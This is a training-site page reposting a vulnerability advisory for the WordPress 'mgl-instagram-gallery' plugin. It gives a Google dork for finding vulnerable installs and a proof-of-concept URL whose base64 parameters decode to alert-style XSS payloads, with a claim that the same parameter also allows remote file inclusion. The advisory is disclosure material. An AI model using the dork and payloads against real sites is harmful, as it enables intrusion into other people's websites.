Ready to Start Your Career?

Mgl-instagram-gallery Xss

Author's profile image

January 1, 2016

\# Exploit Title:wordpress Instagram Photo & Video Gallery Multiple vulnerabilities # Google Dork: inurl:wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media= # Date:28/03/2016 # Author: khan 404 # Software Link: # Version: v2 # Category: webapps # CVE : NA # Tested on: xp,Firefox #Details: wordpress Instagram Photo & Video Gallery is vuln to xss and RFI vuln file:/mgl-instagram-gallery/single-gallery.php Vuln GET PARAMETERs : media= is vuln to RFI AND XSS & Title= is vuln to XSS information passed to parameters must be base64 encoded POC: wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=aHR0cHM6Ly9mYmNkbi1kcmFnb24tYS5ha2FtYWloZC5uZXQvaHBob3Rvcy1hay14cGExL3QzOS4yMzY1LTYvODUxNTY1XzYwMjI2OTk1NjQ3NDE4OF85MTg2Mzg5NzBfbi5wbmcib25sb2FkPSJhbGVydCgnWFNTJyk=&title=PHNjcmlwdD5hbGVydCgndGVzdCcpOzwvc2NyaXB0Pg== Nice one Thanks :)
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry